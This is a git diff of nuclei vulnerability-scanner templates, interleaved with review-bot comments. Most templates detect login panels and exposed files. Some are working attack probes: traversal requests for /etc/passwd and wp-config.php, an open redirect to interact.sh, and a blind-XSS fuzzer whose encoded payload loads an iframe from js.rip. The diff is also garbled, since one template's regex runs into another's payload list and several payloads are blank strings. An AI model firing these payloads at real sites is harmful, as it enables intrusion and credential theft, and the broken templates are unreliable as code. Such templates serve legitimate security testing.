diff --git a/nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml b/nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml similarity index 100% rename from nuclei-templates/Other/aws-ecs-container-agent-tasks-641.yaml rename to nuclei-templates/Other/aws-ecs-container-agent-tasks-640.yaml diff --git a/nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml b/nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml similarity index 100% rename from nuclei-templates/Other/aws-elastic-beanstalk-detect.yaml rename to nuclei-templates/Other/aws-elastic-beanstalk-detect-644.yaml diff --git a/nuclei-templates/Other/aws-object-listing-646.yaml b/nuclei-templates/Other/aws-object-listing-648.yaml similarity index 100% rename from nuclei-templates/Other/aws-object-listing-646.yaml rename to nuclei-templates/Other/aws-object-listing-648.yaml diff --git a/nuclei-templates/Other/aws-opensearch-login-649.yaml b/nuclei-templates/Other/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..14f111d73a --- /dev/null +++ b/nuclei-templates/Other/aws-opensearch-login-649.yaml @@ -0,0 +1,25 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/nuclei-templates/Other/aws-opensearch-login-650.yaml b/nuclei-templates/Other/aws-opensearch-login-650.yaml deleted file mode 100644 index b7bc22b30a..0000000000 --- a/nuclei-templates/Other/aws-opensearch-login-650.yaml +++ /dev/null 
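Review bot: `severity: medium` and `name: AWS OpenSearch Default Login` overstate what the new `aws-opensearch-login-649.yaml` checks: the request only fetches `/_dashboards/app/login` and matches the string `Please login to OpenSearch Dashboards`, no credentials are submitted, so this is a panel detection like the other `panel`-tagged templates in this diff. `severity: info` and a name such as `AWS OpenSearch Dashboards Login Panel` would describe the finding accurately, and the `description` could say it detects the login page rather than "Searches for". The file also ends without a trailing newline (`\ No newline at end of file`), which the deleted `aws-opensearch-login-650.yaml` did not.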
@@ -1,20 +0,0 @@ -id: aws-opensearch-login -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "Please login to OpenSearch Dashboards" diff --git a/nuclei-templates/Other/aws-redirect-651.yaml b/nuclei-templates/Other/aws-redirect-651.yaml deleted file mode 100644 index e337d182fd..0000000000 --- a/nuclei-templates/Other/aws-redirect-651.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-redirect - -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: info - reference: - - https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover - -requests: - - method: GET - path: - - '{{BaseURL}}' - - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/nuclei-templates/Other/aws-redirect-654.yaml b/nuclei-templates/Other/aws-redirect-654.yaml new file mode 100644 index 0000000000..1826635a49 --- /dev/null +++ b/nuclei-templates/Other/aws-redirect-654.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws,takeover + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header 
diff --git a/nuclei-templates/Other/awstats-config-655.yaml b/nuclei-templates/Other/awstats-config-655.yaml new file mode 100644 index 0000000000..9a4cb3cb84 --- /dev/null +++ b/nuclei-templates/Other/awstats-config-655.yaml @@ -0,0 +1,26 @@ +id: awstats-config + +info: + name: AWStats config + author: sheikhrishad + severity: info + tags: config,exposure,awstats + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats/" + - "{{BaseURL}}/awstats.conf" + + matchers: + - type: word + words: + - "AWSTATS CONFIGURE" + - "MAIN SETUP SECTION" + condition: and + + - type: word + words: + - "Index of /awstats" + - "Parent Directory" + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-config-656.yaml b/nuclei-templates/Other/awstats-config-656.yaml deleted file mode 100644 index 8509655870..0000000000 --- a/nuclei-templates/Other/awstats-config-656.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: awstats-config - -info: - name: AWStats config - author: sheikhrishad - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats/" - - "{{BaseURL}}/awstats.conf" - - matchers: - - type: word - words: - - "AWSTATS CONFIGURE" - - "MAIN SETUP SECTION" - condition: and - - - type: word - words: - - "Index of /awstats" - - "Parent Directory" - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script-657.yaml b/nuclei-templates/Other/awstats-script-657.yaml new file mode 100644 index 0000000000..3631c6a328 --- /dev/null +++ b/nuclei-templates/Other/awstats-script-657.yaml 
@@ -0,0 +1,29 @@ +id: awstats-script + +info: + name: AWStats script + author: sheikhrishad + severity: info + tags: config,exposure,awstats + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats.pl" + - "{{BaseURL}}/logs/awstats.pl" + - "{{BaseURL}}/webstats/awstats.pl" + + matchers-condition: and + matchers: + - type: word + words: + - "Do not remove this line" + + - type: word + part: header + words: + - "application/x-perl" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/awstats-script.yaml b/nuclei-templates/Other/awstats-script.yaml deleted file mode 100644 index 9a81b722f3..0000000000 --- a/nuclei-templates/Other/awstats-script.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: awstats-script - -info: - name: AWStats script - author: sheikhrishad - severity: info - tags: config,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats.pl" - - "{{BaseURL}}/logs/awstats.pl" - - "{{BaseURL}}/webstats/awstats.pl" - - matchers-condition: and - matchers: - - type: word - words: - - "Do not remove this line" - - - type: word - words: - - "application/x-perl" - part: header - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/axigen-webadmin-660.yaml b/nuclei-templates/Other/axigen-webadmin-660.yaml new file mode 100644 index 0000000000..515f319cbe --- /dev/null +++ b/nuclei-templates/Other/axigen-webadmin-660.yaml @@ -0,0 +1,31 @@ +id: axigen-webadmin + +info: + name: Axigen Web Admin Detection + author: dhiyaneshDk + severity: info + description: An Axigen Web Admin panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Axigen WebAdmin' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 
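Review bot: `awstats-script-657.yaml` has no `description`, and the header matcher on `application/x-perl` is the part a reader needs explained: a 200 response for `awstats.pl` with that content type presumably means the server is returning the script as raw Perl rather than executing it, which is a source-disclosure condition and not merely "AWStats is installed". Suggested `description: AWStats CGI script is served as raw Perl source (Content-Type application/x-perl) instead of being executed, disclosing its contents.` If that reading is right, `severity: info` and `tags: config,exposure,awstats` may also be worth revisiting, since the body marker `Do not remove this line` is a line from the script itself.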
diff --git a/nuclei-templates/Other/axigen-webadmin.yaml b/nuclei-templates/Other/axigen-webadmin.yaml deleted file mode 100644 index 0e54704559..0000000000 --- a/nuclei-templates/Other/axigen-webadmin.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: axigen-webadmin - -info: - name: Axigen Web Admin Detection - author: dhiyaneshDk - severity: info - description: An Axigen Web Admin panel was discovered. - reference: - - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Axigen WebAdmin' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/axigen-webmail-664.yaml b/nuclei-templates/Other/axigen-webmail-664.yaml new file mode 100644 index 0000000000..0b61e4d8bd --- /dev/null +++ b/nuclei-templates/Other/axigen-webmail-664.yaml 
@@ -0,0 +1,40 @@ +id: axigen-webmail + +info: + name: Axigen WebMail PanelDetection + author: dhiyaneshDk,idealphase + severity: info + description: An Axigen webmail panel was discovered. + reference: + - https://www.axigen.com/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebMail" + tags: axigen,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)(Axigen WebMail)' + - 'Axigen Standard Webmail - (.*)' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + part: body + regex: + - '" + script_payload_2: "\"><41707" + script_payload_3: "" + script_payload_4: "" + script_payload_5: "" + script_payload_6: "" + script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" + script_payload_8: "%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fjs%2Erip%2F1wqkhxuglq%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E" + +http: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + blind: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{blind}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{script_payload_1}}" + - "{{script_payload_2}}" + - "{{script_payload_3}}" + - "{{script_payload_4}}" + - "{{script_payload_5}}" + - "{{script_payload_6}}" + - "{{script_payload_7}}" + - "{{script_payload_8}}" + - type: word + part: header + 
words: + - "text/html" diff --git a/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml b/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml new file mode 100644 index 0000000000..53aae9268e --- /dev/null +++ b/nuclei-templates/Other/blogintroduction-wordpress-plugin.yaml @@ -0,0 +1,59 @@ +id: blogintroduction-wordpress-plugin + +info: + name: > + Blog Introduction <= 0.3.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2896c925-e035-4193-92db-e8a3dd34a0b7?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blogintroduction-wordpress-plugin/" + google-query: inurl:"/wp-content/plugins/blogintroduction-wordpress-plugin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blogintroduction-wordpress-plugin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blogintroduction-wordpress-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blogintroduction-wordpress-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.3.0') \ No newline at end of file diff --git a/nuclei-templates/Other/blue-iris-login-751.yaml b/nuclei-templates/Other/blue-iris-login-751.yaml deleted file mode 100644 index 783f3c0527..0000000000 --- a/nuclei-templates/Other/blue-iris-login-751.yaml +++ /dev/null 
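Review bot: Several fields in the new `blogintroduction-wordpress-plugin.yaml` are left empty: `description: >` has no text, `cvss-metrics:`, `cvss-score:` and `cve-id:` under `classification` are blank, and `shodan-query: 'vuln:'` is an empty query. A blank `cve-id` together with `tags: cve,...` is misleading, since the Wordfence reference in the hunk supplies a vulnerability id but no CVE number; either fill the fields from that advisory or drop the empty keys and the `cve` tag. The word matcher `blogintroduction-wordpress-plugin` is applied to the body of `readme.txt`, which does not necessarily contain the plugin slug, so the match may in practice rest on the status check and `compare_versions(version, '<= 0.3.0')` alone — worth confirming against a real readme.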
@@ -1,36 +0,0 @@ -id: blue-iris-login - -info: - name: Blue Iris Login - author: dhiyaneshDK,idealphase - severity: info - description: A Blue Iris login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6814 - - https://blueirissoftware.com/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Blue Iris Login" - tags: panel,blueiris - -requests: - - method: GET - path: - - '{{BaseURL}}/login.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Blue Iris Login' - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - 'var bi_version = "(.*)";' diff --git a/nuclei-templates/Other/blue-iris-login-753.yaml b/nuclei-templates/Other/blue-iris-login-753.yaml new file mode 100644 index 0000000000..4a1e4acd08 --- /dev/null +++ b/nuclei-templates/Other/blue-iris-login-753.yaml @@ -0,0 +1,31 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + description: A Blue Iris login panel was detected. + reference: + - https://www.exploit-db.com/ghdb/6814 + - https://blueirissoftware.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,blue-iris + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml b/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml deleted file mode 100644 index d2f7caa672..0000000000 --- a/nuclei-templates/Other/blue-ocean-excellence-lfi-755.yaml +++ /dev/null 
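Review bot: The new `blue-iris-login-753.yaml` drops the `extractors` block with `var bi_version = "(.*)";` that `blue-iris-login-751.yaml`, deleted in the same diff, used to report the Blue Iris version, and it also loses `idealphase` from `author` and changes the tag from `blueiris` to `blue-iris`. If 753 is meant to be the surviving copy, restoring the extractor keeps version information in results, which is what triage needs from a panel finding; if both are meant to coexist under the same `id: blue-iris-login`, that will be a duplicate-id issue for the loader. Cosmetically, the `- type: status` matcher in the new file has no blank line before it, unlike the other templates here.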
@@ -1,25 +0,0 @@ -id: blue-ocean-excellence-lfi - -info: - name: Blue Ocean Excellence LFI - author: pikpikcu - severity: high - reference: - - https://blog.csdn.net/qq_41901122/article/details/116786883 - tags: blue-ocean,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "toor:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml b/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml new file mode 100644 index 0000000000..d6b0d7bc38 --- /dev/null +++ b/nuclei-templates/Other/blue-ocean-excellence-lfi.yaml @@ -0,0 +1,27 @@ +id: blue-ocean-excellence-lfi +info: + name: Blue Ocean Excellence - Local File Inclusion + author: pikpikcu + severity: high + description: Blue Ocean Excellence is vulnerable to local file inclusion. + reference: + - https://blog.csdn.net/qq_41901122/article/details/116786883 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: blue-ocean,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "toor:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/Other/bolt-cms-panel.yaml b/nuclei-templates/Other/bolt-cms-panel-763.yaml similarity index 100% rename from nuclei-templates/Other/bolt-cms-panel.yaml rename to nuclei-templates/Other/bolt-cms-panel-763.yaml diff --git a/nuclei-templates/Other/bower-json-769.yaml b/nuclei-templates/Other/bower-json-769.yaml deleted file mode 100644 index 67f8c44101..0000000000 --- a/nuclei-templates/Other/bower-json-769.yaml +++ /dev/null 
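Review bot: The regex `toor:[x*]:0:0` in `blue-ocean-excellence-lfi.yaml` only matches a `toor` account (`[x*]` is a character class for `x` or `*`), so a standard `/etc/passwd` whose first entry is `root:x:0:0:` does not satisfy the matcher and the template reports a false negative on most targets. The deleted `blue-ocean-excellence-lfi-755.yaml` carries the same pattern, so this is inherited; the usual form for this check is `- "root:.*:0:0:"`. The new file also removes the blank lines between sections, unlike the deleted copy — cosmetic, but inconsistent with neighbouring templates.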
@@ -1,31 +0,0 @@ -id: bower-json - -info: - name: bower.json file disclosure - author: oppsec - severity: info - description: Bower is a package manager which stores packages informations in bower.json file - tags: exposure - -requests: - - method: GET - path: - - "{{BaseURL}}/bower.json" - - matchers-condition: and - matchers: - - type: word - words: - - "name" - - "description" - - "main" - condition: and - - - type: word - words: - - "application/json" - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/bower-json-770.yaml b/nuclei-templates/Other/bower-json-770.yaml new file mode 100644 index 0000000000..8d59c7f9bb --- /dev/null +++ b/nuclei-templates/Other/bower-json-770.yaml @@ -0,0 +1,31 @@ +id: bower-json + +info: + name: bower.json file disclosure + author: oppsec + severity: info + description: Bower is a package manager which stores package information in the bower.json file + tags: exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/bower.json" + + matchers-condition: and + matchers: + - type: word + words: + - "name" + - "description" + - "main" + condition: and + + - type: word + words: + - "application/json" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/branch-key-774.yaml b/nuclei-templates/Other/branch-key.yaml similarity index 100% rename from nuclei-templates/Other/branch-key-774.yaml rename to nuclei-templates/Other/branch-key.yaml diff --git a/nuclei-templates/Other/brandfolder-lfi-776.yaml b/nuclei-templates/Other/brandfolder-lfi-776.yaml new file mode 100644 index 0000000000..2cb1f03bf0 --- /dev/null +++ b/nuclei-templates/Other/brandfolder-lfi-776.yaml 
@@ -0,0 +1,29 @@ +id: brandfolder-lfi + +info: + name: Wordpress brandfolder plugin - RFI & LFI + author: 0x_Akoko + severity: high + description: A vulnerability in WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. + reference: + - https://www.exploit-db.com/exploits/39591 + - https://cxsecurity.com/issue/WLB-2016030120 + tags: wordpress,wp-plugin,lfi,rfi + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/brandfolder-lfi-778.yaml b/nuclei-templates/Other/brandfolder-lfi-778.yaml deleted file mode 100644 index bf52f7690b..0000000000 --- a/nuclei-templates/Other/brandfolder-lfi-778.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: brandfolder-lfi -info: - name: Wordpress Brandfolder - Remote/Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content. - reference: - - https://www.exploit-db.com/exploits/39591 - - https://cxsecurity.com/issue/WLB-2016030120 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - tags: wordpress,wp-plugin,lfi,rfi -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 
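Review bot: The new `brandfolder-lfi-776.yaml` omits the `classification` block (`cvss-metrics`, `cvss-score: 7.5`, `cwe-id: CWE-22`) and the more specific name `Wordpress Brandfolder - Remote/Local File Inclusion` that `brandfolder-lfi-778.yaml`, deleted in the same diff, carried; if 776 is the surviving copy, that metadata should move over, since it is what downstream tooling uses to rank a `high` finding. Restoring `classification:` with the three keys from 778 is a three-line change. Also, `part: body` is placed after `words:` in the first matcher while the other templates here put `part` first — cosmetic, but worth aligning.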
diff --git a/nuclei-templates/Other/brandfolder-open-redirect-782.yaml b/nuclei-templates/Other/brandfolder-open-redirect-782.yaml new file mode 100644 index 0000000000..e471dd75b4 --- /dev/null +++ b/nuclei-templates/Other/brandfolder-open-redirect-782.yaml @@ -0,0 +1,18 @@ +id: brandfolder-open-redirect +info: + name: WordPress Brandfolder Plugin Open Redirect + author: 0x_Akoko + severity: low + description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. + reference: + - https://www.exploit-db.com/exploits/39591 + tags: wordpress,wp-plugin,lfi,rfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header diff --git a/nuclei-templates/Other/brandfolder-open-redirect.yaml b/nuclei-templates/Other/brandfolder-open-redirect.yaml deleted file mode 100644 index 7c050c1701..0000000000 --- a/nuclei-templates/Other/brandfolder-open-redirect.yaml +++ /dev/null 
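Review bot: `tags: wordpress,wp-plugin,lfi,rfi` in `brandfolder-open-redirect-782.yaml` does not describe the template: the name, the description and the `Location` regex all test an open redirect through `wp_abspath`, not file inclusion, so `tags: wordpress,wp-plugin,redirect` is the accurate line (the `attitude-theme-open-redirect` template removed at the top of this diff uses `redirect`). The same mismatch exists in the deleted `brandfolder-open-redirect.yaml`, so it is inherited. A `classification:` with `cwe-id: CWE-601` would also let this finding be categorised with other open-redirect templates.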
@@ -1,23 +0,0 @@ -id: brandfolder-open-redirect - -info: - name: WordPress Brandfolder - Remote/Local File Inclusion - author: 0x_Akoko - severity: low - description: WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. - reference: - - https://www.exploit-db.com/exploits/39591 - tags: wordpress,wp-plugin,lfi,rfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/brightcove-takeover.yaml b/nuclei-templates/Other/brightcove-takeover-785.yaml similarity index 100% rename from nuclei-templates/Other/brightcove-takeover.yaml rename to nuclei-templates/Other/brightcove-takeover-785.yaml diff --git a/nuclei-templates/Other/brother-printer-detect-789.yaml b/nuclei-templates/Other/brother-printer-detect-789.yaml new file mode 100644 index 0000000000..941f6faff9 --- /dev/null +++ b/nuclei-templates/Other/brother-printer-detect-789.yaml @@ -0,0 +1,31 @@ +id: brother-printer-detect + +info: + name: Brother Printer + + author: pussycat0x + + severity: low + + reference: https://www.exploit-db.com/ghdb/6889 + + tags: iot,printer,tech + +requests: + - method: GET + + path: + - "{{BaseURL}}/general/status.html" + + matchers-condition: and + + matchers: + - type: word + + words: + - "Brother Industries" + + - type: status + + status: + - 200 diff --git a/nuclei-templates/Other/brother-printer-detect-790.yaml b/nuclei-templates/Other/brother-printer-detect-790.yaml deleted file mode 100644 index ecf0f021fc..0000000000 --- a/nuclei-templates/Other/brother-printer-detect-790.yaml +++ /dev/null 
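Review bot: `brother-printer-detect-789.yaml` puts a blank line after every key (`name:`, `author:`, `severity:`, `reference:`, `path:`, `words:`, `status:`), which no other template in this diff does and which the deleted `brother-printer-detect-790.yaml` did not; the compact layout of 790 is the one to keep. `severity: low` is also out of line with the other `tech` and panel detection templates here, which use `info`, since the request only fetches `/general/status.html` and matches the string `Brother Industries`.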
@@ -1,23 +0,0 @@ -id: brother-printer-detect - -info: - name: Brother Printer - author: pussycat0x - severity: low - reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/general/status.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/brother-unauthorized-access-792.yaml b/nuclei-templates/Other/brother-unauthorized-access-792.yaml deleted file mode 100644 index f0e73f3ef8..0000000000 --- a/nuclei-templates/Other/brother-unauthorized-access-792.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: brother-unauthorized-access - -info: - name: Brother Printer - author: pussycat0x - severity: medium - reference: https://www.exploit-db.com/ghdb/6889 - tags: iot,printer,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/net/net/net.html" - - matchers-condition: and - matchers: - - type: word - words: - - "Brother Industries" - - "Network Status" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/brother-unauthorized-access.yaml b/nuclei-templates/Other/brother-unauthorized-access.yaml new file mode 100644 index 0000000000..f3e5d8283c --- /dev/null +++ b/nuclei-templates/Other/brother-unauthorized-access.yaml @@ -0,0 +1,25 @@ +id: brother-unauthorized-access + +info: + name: Brother Printer + author: pussycat0x + severity: medium + reference: https://www.exploit-db.com/ghdb/6889 + tags: iot,printer,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/net/net/net.html" + + matchers-condition: and + matchers: + - type: word + words: + - "Brother Industries" + - "Network Status" + condition: and + + - type: status + status: + - 200 
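Review bot: `name: Brother Printer` in the new `brother-unauthorized-access.yaml` is identical to the name of `brother-printer-detect-789.yaml`, so results from the two templates cannot be told apart by name, and there is no `description` saying what the `medium` finding is. From the matchers (`/net/net/net.html` returning `Network Status` with status 200) something like `name: Brother Printer - Unauthenticated Network Status Page` and `description: The printer's network status page is reachable without authentication.` would document it; confirm that the page is normally behind authentication before asserting that. The deleted `brother-unauthorized-access-792.yaml` has the same gap, so this is inherited.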
diff --git a/nuclei-templates/Other/browserless-debugger-794.yaml b/nuclei-templates/Other/browserless-debugger-795.yaml similarity index 100% rename from nuclei-templates/Other/browserless-debugger-794.yaml rename to nuclei-templates/Other/browserless-debugger-795.yaml diff --git a/nuclei-templates/Other/buddy-panel-796.yaml b/nuclei-templates/Other/buddy-panel-796.yaml deleted file mode 100644 index bfe3720b01..0000000000 --- a/nuclei-templates/Other/buddy-panel-796.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: buddy-panel -info: - name: Buddy Panel Detect - author: thardt-praetorian - severity: info - reference: - - https://buddy.works - metadata: - shodan-query: http.favicon.hash:-850502287 - tags: panel,buddy,cicd -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Buddy App' - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/buddy-panel.yaml b/nuclei-templates/Other/buddy-panel.yaml new file mode 100644 index 0000000000..b227e65241 --- /dev/null +++ b/nuclei-templates/Other/buddy-panel.yaml @@ -0,0 +1,30 @@ +id: buddy-panel + +info: + name: Buddy Panel Detect + author: thardt-praetorian + severity: info + reference: https://buddy.works + metadata: + shodan-query: http.favicon.hash:-850502287 + tags: panel,buddy,cicd + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Buddy App' + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/buffalo-config-injection-800.yaml b/nuclei-templates/Other/buffalo-config-injection-800.yaml new file mode 100644 index 0000000000..ba678d6928 --- /dev/null +++ b/nuclei-templates/Other/buffalo-config-injection-800.yaml 
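Review bot: As rendered, the first entry under `words` in `buddy-panel.yaml` is the empty string `''`; with `condition: or` that makes the word matcher true for every response, so the template would fire on any page that returns 200 after redirects. This may be an extraction artifact (an HTML title tag stripped from the diff — the deleted `buddy-panel-796.yaml` shows the same `''`), so check the committed file; if the entry is genuinely empty, remove it or replace it with the intended title marker.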
